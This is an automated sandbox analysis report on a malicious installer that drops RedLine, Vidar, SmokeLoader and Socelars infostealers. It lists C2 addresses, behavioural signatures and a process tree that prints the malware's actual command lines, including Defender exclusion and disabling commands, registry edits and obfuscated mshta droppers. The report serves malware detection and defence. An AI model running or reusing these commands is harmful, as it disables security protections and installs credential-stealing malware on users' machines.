Resubmissions

05-10-2021 16:27

211005-tx24csaah9 10

04-10-2021 16:37

211004-t43cpsgfe7 10

04-10-2021 07:39

211004-jhgtrsfhf8 10

03-10-2021 18:09

211003-wryvvsffgk 10

02-10-2021 23:31

211002-3hwsgaehhl 10

02-10-2021 06:10

211002-gxfh5sdgg7 10

01-10-2021 13:44

211001-q16deabhek 10

Analysis

  • max time kernel
    1805s
  • max time network
    1812s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    04-10-2021 07:39

General

  • Target

    setup_x86_x64_install.exe

  • Size

    6.4MB

  • MD5

    c6e46aa3d6424b03e0a4ccb193d3eade

  • SHA1

    c8b49055743fa7b4d6a982aea26efb627bb1f2e1

  • SHA256

    5e2bf564a4f985a7482d505def1ec79c92566bf7eda4724811ee29b9c4a66156

  • SHA512

    06e0c7d8012d4dbf1e6ccb7049c16d3041eb792261cc9910115c8663a45272c90cbce0ccd51875b8cd465b8f5a5c9f69164cc665b60787884ac42aec3aa7d32e

Malware Config

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

vidar

Version

41.1

Botnet

921

C2

https://mas.to/@bardak1ho

Attributes
  • profile_id

    921

Extracted

Family

smokeloader

Version

2020

C2

http://fiskahlilian16.top/

http://paishancho17.top/

http://ydiannetter18.top/

http://azarehanelle19.top/

http://quericeriant20.top/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 26 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 40 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 55 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 18 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 22 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 50 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: SetClipboardViewer 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4092
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4776
      • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4824
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1176
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Fri1034cd265b5e0adcd.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4792
          • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri1034cd265b5e0adcd.exe
            Fri1034cd265b5e0adcd.exe
            5⤵
            • Executes dropped EXE
            PID:4408
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri1034cd265b5e0adcd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri1034cd265b5e0adcd.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )
              6⤵
                PID:5304
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri1034cd265b5e0adcd.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri1034cd265b5e0adcd.exe" ) do taskkill -F -Im "%~nXU"
                  7⤵
                    PID:5604
                    • C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
                      SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
                      8⤵
                      • Executes dropped EXE
                      PID:6024
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )
                        9⤵
                          PID:4660
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
                            10⤵
                              PID:5740
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
                            9⤵
                              PID:1880
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
                                10⤵
                                  PID:6544
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
                                    11⤵
                                      PID:5960
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                      11⤵
                                        PID:5256
                                      • C:\Windows\SysWOW64\control.exe
                                        control .\FUEj5.QM
                                        11⤵
                                          PID:5828
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
                                            12⤵
                                            • Loads dropped DLL
                                            PID:6108
                                            • C:\Windows\system32\RunDll32.exe
                                              C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
                                              13⤵
                                                PID:5252
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
                                                  14⤵
                                                  • Loads dropped DLL
                                                  PID:5040
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill -F -Im "Fri1034cd265b5e0adcd.exe"
                                      8⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6060
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Fri10584c049c7f.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4760
                              • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri10584c049c7f.exe
                                Fri10584c049c7f.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4108
                                • C:\Users\Admin\Documents\rI53iv_O1ToZKYbnWDPGHFxc.exe
                                  "C:\Users\Admin\Documents\rI53iv_O1ToZKYbnWDPGHFxc.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:5964
                                • C:\Users\Admin\Documents\GEPNcSdOGmwc048ZatwGM149.exe
                                  "C:\Users\Admin\Documents\GEPNcSdOGmwc048ZatwGM149.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:6228
                                • C:\Users\Admin\Documents\zhu__bBi3hf2knL5Rmn4m6Nk.exe
                                  "C:\Users\Admin\Documents\zhu__bBi3hf2knL5Rmn4m6Nk.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:6208
                                • C:\Users\Admin\Documents\R7lMkx6fQJ1invX2DXySlnaT.exe
                                  "C:\Users\Admin\Documents\R7lMkx6fQJ1invX2DXySlnaT.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:6196
                                  • C:\Users\Admin\Documents\R7lMkx6fQJ1invX2DXySlnaT.exe
                                    "C:\Users\Admin\Documents\R7lMkx6fQJ1invX2DXySlnaT.exe"
                                    7⤵
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: MapViewOfSection
                                    PID:3972
                                • C:\Users\Admin\Documents\3PdeIDP5BT_FQNcLW3wfrRcz.exe
                                  "C:\Users\Admin\Documents\3PdeIDP5BT_FQNcLW3wfrRcz.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of SetThreadContext
                                  PID:6184
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                    7⤵
                                      PID:1880
                                  • C:\Users\Admin\Documents\DlQ8XKOJGHLxQWp3SNDH82xa.exe
                                    "C:\Users\Admin\Documents\DlQ8XKOJGHLxQWp3SNDH82xa.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:6172
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6172 -s 240
                                      7⤵
                                      • Program crash
                                      • Checks processor information in registry
                                      • Enumerates system info in registry
                                      PID:5984
                                  • C:\Users\Admin\Documents\UkISyuDsVBUYDmB2pYcO8lYW.exe
                                    "C:\Users\Admin\Documents\UkISyuDsVBUYDmB2pYcO8lYW.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:6152
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6152 -s 268
                                      7⤵
                                      • Program crash
                                      • Checks processor information in registry
                                      • Enumerates system info in registry
                                      PID:4748
                                  • C:\Users\Admin\Documents\uQ4JSrQ4zAAFUsFbLa_4f6RE.exe
                                    "C:\Users\Admin\Documents\uQ4JSrQ4zAAFUsFbLa_4f6RE.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:6140
                                  • C:\Users\Admin\Documents\vtHlZhoXoYi751_MnSEdVLZK.exe
                                    "C:\Users\Admin\Documents\vtHlZhoXoYi751_MnSEdVLZK.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:496
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 276
                                      7⤵
                                      • Program crash
                                      • Checks processor information in registry
                                      • Enumerates system info in registry
                                      PID:7588
                                  • C:\Users\Admin\Documents\eVSBFtoEHzoVekJFnGozYiu0.exe
                                    "C:\Users\Admin\Documents\eVSBFtoEHzoVekJFnGozYiu0.exe"
                                    6⤵
                                      PID:4796
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 268
                                        7⤵
                                        • Program crash
                                        • Checks processor information in registry
                                        • Enumerates system info in registry
                                        PID:4528
                                    • C:\Users\Admin\Documents\e59gPz3TIA2rv_EDc3xS7_xZ.exe
                                      "C:\Users\Admin\Documents\e59gPz3TIA2rv_EDc3xS7_xZ.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:5704
                                    • C:\Users\Admin\Documents\HLfyKbpkFhzhmlsYT5uFOb0u.exe
                                      "C:\Users\Admin\Documents\HLfyKbpkFhzhmlsYT5uFOb0u.exe"
                                      6⤵
                                        PID:5708
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 296
                                          7⤵
                                          • Program crash
                                          • Checks processor information in registry
                                          • Enumerates system info in registry
                                          PID:1772
                                      • C:\Users\Admin\Documents\pd6ZCExN6Xk096sLQcFjn0DE.exe
                                        "C:\Users\Admin\Documents\pd6ZCExN6Xk096sLQcFjn0DE.exe"
                                        6⤵
                                          PID:5664
                                          • C:\Users\Admin\Documents\pd6ZCExN6Xk096sLQcFjn0DE.exe
                                            "C:\Users\Admin\Documents\pd6ZCExN6Xk096sLQcFjn0DE.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:7020
                                        • C:\Users\Admin\Documents\H_j1zAB2uhUIMvIOwbiqM_ey.exe
                                          "C:\Users\Admin\Documents\H_j1zAB2uhUIMvIOwbiqM_ey.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:6020
                                        • C:\Users\Admin\Documents\6Qi2mqv84OAcwbCBilXXWHS5.exe
                                          "C:\Users\Admin\Documents\6Qi2mqv84OAcwbCBilXXWHS5.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          PID:5496
                                          • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                            "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5604
                                          • C:\Program Files (x86)\Company\NewProduct\inst002.exe
                                            "C:\Program Files (x86)\Company\NewProduct\inst002.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:1156
                                          • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                            "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:1420
                                            • C:\Users\Admin\AppData\Roaming\4736138.scr
                                              "C:\Users\Admin\AppData\Roaming\4736138.scr" /S
                                              8⤵
                                                PID:4536
                                              • C:\Users\Admin\AppData\Roaming\8218967.scr
                                                "C:\Users\Admin\AppData\Roaming\8218967.scr" /S
                                                8⤵
                                                • Suspicious behavior: SetClipboardViewer
                                                PID:1344
                                              • C:\Users\Admin\AppData\Roaming\2854170.scr
                                                "C:\Users\Admin\AppData\Roaming\2854170.scr" /S
                                                8⤵
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:5180
                                              • C:\Users\Admin\AppData\Roaming\3125843.scr
                                                "C:\Users\Admin\AppData\Roaming\3125843.scr" /S
                                                8⤵
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:7664
                                              • C:\Users\Admin\AppData\Roaming\7035267.scr
                                                "C:\Users\Admin\AppData\Roaming\7035267.scr" /S
                                                8⤵
                                                  PID:8116
                                            • C:\Users\Admin\Documents\ZCOidsv2hYAEoB74Jq_64n_G.exe
                                              "C:\Users\Admin\Documents\ZCOidsv2hYAEoB74Jq_64n_G.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Drops file in Program Files directory
                                              PID:2868
                                              • C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe
                                                "C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"
                                                7⤵
                                                  PID:6192
                                                  • C:\Users\Admin\Documents\VBREE9vth0umpL_CT26e69ew.exe
                                                    "C:\Users\Admin\Documents\VBREE9vth0umpL_CT26e69ew.exe"
                                                    8⤵
                                                      PID:4208
                                                    • C:\Users\Admin\Documents\da9KpOKPebUDIsqw10z8uoaa.exe
                                                      "C:\Users\Admin\Documents\da9KpOKPebUDIsqw10z8uoaa.exe"
                                                      8⤵
                                                      • Suspicious use of SetThreadContext
                                                      PID:8052
                                                      • C:\Users\Admin\Documents\da9KpOKPebUDIsqw10z8uoaa.exe
                                                        "C:\Users\Admin\Documents\da9KpOKPebUDIsqw10z8uoaa.exe"
                                                        9⤵
                                                          PID:5132
                                                      • C:\Users\Admin\Documents\wxXGjdl4dlWRg0dRpr4qn_ZO.exe
                                                        "C:\Users\Admin\Documents\wxXGjdl4dlWRg0dRpr4qn_ZO.exe"
                                                        8⤵
                                                          PID:6112
                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC450.tmp\Install.exe
                                                            .\Install.exe
                                                            9⤵
                                                              PID:5692
                                                              • C:\Users\Admin\AppData\Local\Temp\7zSE3DE.tmp\Install.exe
                                                                .\Install.exe /S /site_id "668658"
                                                                10⤵
                                                                • Checks BIOS information in registry
                                                                • Drops file in System32 directory
                                                                • Enumerates system info in registry
                                                                PID:7080
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                  11⤵
                                                                    PID:3128
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                      12⤵
                                                                        PID:6908
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                          13⤵
                                                                            PID:8128
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                              14⤵
                                                                                PID:8088
                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                  15⤵
                                                                                    PID:6540
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                              12⤵
                                                                                PID:1276
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                  13⤵
                                                                                    PID:5148
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                  12⤵
                                                                                    PID:5920
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                      13⤵
                                                                                        PID:6872
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                          14⤵
                                                                                            PID:1532
                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                              15⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:8068
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                        12⤵
                                                                                          PID:6012
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                            13⤵
                                                                                              PID:2964
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                14⤵
                                                                                                • Blocklisted process makes network request
                                                                                                • Checks BIOS information in registry
                                                                                                PID:6552
                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                  15⤵
                                                                                                    PID:1788
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                            11⤵
                                                                                              PID:2992
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                12⤵
                                                                                                  PID:5748
                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                    13⤵
                                                                                                      PID:3580
                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                      13⤵
                                                                                                        PID:2208
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                    11⤵
                                                                                                      PID:5804
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        12⤵
                                                                                                          PID:7880
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                          12⤵
                                                                                                            PID:4324
                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                              13⤵
                                                                                                                PID:7652
